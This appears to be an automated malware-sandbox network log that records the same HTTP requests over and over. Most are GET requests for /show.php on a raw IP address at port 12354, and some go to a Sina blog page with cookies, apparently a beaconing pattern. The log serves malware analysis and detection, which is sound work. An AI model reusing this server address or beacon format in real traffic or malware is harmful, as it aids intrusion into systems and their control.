Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
